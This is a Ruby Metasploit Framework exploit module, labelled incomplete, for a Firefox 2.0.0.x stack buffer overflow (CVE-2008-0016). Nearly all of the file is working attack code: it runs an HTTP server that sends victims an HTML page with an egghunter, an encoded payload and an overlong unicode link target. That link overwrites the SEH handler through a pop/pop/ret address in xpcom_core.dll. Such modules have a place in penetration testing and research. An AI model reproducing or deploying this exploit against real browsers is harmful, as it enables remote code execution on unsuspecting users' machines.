##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class MetasploitModule < Msf::Exploit::Remote

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '[INCOMPLETE] Firefox 2.0.0.16 Unicode Link Target stack buffer overflow',
			'Description'    => %q{

			},
			'License'        => MSF_LICENSE,
			'Author'         => [
									'Dominic Chell <dmc@deadbeef.co.uk>', # original exploit
									'egypt',                              # Metasploit conversion
								],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2008-0016'],
					['MIL', '9663']
				],
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x5d",
					'StackAdjustment' => -3500,
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					[ 'Firefox 2.0.0.15 on Windows XP SP0-SP3', 
						{
							'Platform'   => 'win',
							'Arch'       => ARCH_X86,
							'Ret'        => 0x603711e7, # pop/pop/ret - xpcom_core.dll
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Sep 25 2009'
			))

	end

	def on_request_uri(cli, request)
		print_status("Sending #{self.name} to #{cli.peerhost}")
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		hunter = generate_egghunter()
		egg    = hunter[1]

		pattern = "\x90" * 3402
		pattern << "\xeb\x10\x90\x90"  # ptr to next seh
		pattern << [target.ret].pack("V")
		pattern << "\x90" * 10
		#pattern << "\xCC"
		#pattern << ((255.downto(0)).collect { |b| [b].pack("c") }).join
		pattern << hunter[0]
		pattern << "\xCC\xCC" * (5000 - pattern.length) 

		html = "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\" />\n<html>\n<body>\n"
		html << "<!CDATA[" + egg + egg + payload.encoded + "]>\n"
		html << "<a href=\""
		html << "\x01"
		html << "xx://dmc"
		html << Rex::Text.to_unicode("\xc3\xba", "utf-8")
		html << "/"
		html << entity_encode(pattern)
		html << "\" >s</a>"
		html << "\n</body>"
		html << "\n</html>"
	
		print_line Rex::Text.to_hex_dump(payload.encoded)
	
		send_response_html(cli, html, { "Content-Type" => "text/html;charset=utf-8" })
	end

	def entity_encode(str)
		# make sure it's even length by padding with the last character
		(str.length % 4).times {
			str << str[str.length - 1]
		}
		enc = ""
		str.scan(/..../).each { |a|
			enc << sprintf("&#x%02x%02x;&#x%02x%02x;", a[1], a[0], a[3], a[2])
		}
		return enc
	end
end
